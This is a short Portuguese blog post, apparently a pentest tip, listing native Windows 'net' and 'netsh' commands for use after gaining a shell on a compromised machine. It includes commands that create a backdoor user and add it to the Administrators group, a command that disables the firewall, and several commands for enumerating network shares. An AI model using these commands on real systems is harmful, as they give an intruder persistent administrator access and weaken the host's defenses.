Em algumas fases de pentest ou no seu cotidiano, você vai deparar com um Windows e suas inúmeras vulnerabilidades... caso esteja usando o grande metasploit, você ainda encontra alguns scripts meterpreter que ja quebram o galho, mas não em todas as vezes... e no caso que você esteja usando um exploit monolítico? você digita "whoami" e ver que não tem acesso "root/administrador" do sistema... ta com o cmd.exe na tela e de braços cruzado!!! não entre em desespero... vou mostrar a solução.
Usando alguns comando nativos do Windows, pode reverter esse caso fácil.
Adicionando um usuário no sistema:
net user bhior fabiano1337 /add
Criar grupos e/ou atribuir/remover usuários de grupos específicos:
net localgroup
Adicionado um usuário como administrador ou qualquer outro grupo descrito com o comando acima.
net localgroup Administrador bhior /add
Modifica a requisitos de senha e logon para todas contas:
net accounts
Exibindo informações de configuração do serviço Estação de Trabalho ou Servidor:
net config [server | workstation]
Visualizando computadores on line na rede com compartilhamento:
net view
Visualizando os diretórios compartilhados no seu micro:
net share
Visualizando as maquinas que estão acessando os diretórios compartilhados:
net use
Exibindo os logs das estação de trabalho ou servidor:
net statistics [server | workstation]
Ajuda com o comando?
net help
Caso o firewall esteja impedindo algum outro processo que você esteja querendo fazer:
netsh firewall set opmode disable
Xeque mate!!!
Muito bom, Muito obrigadooo
ResponderExcluir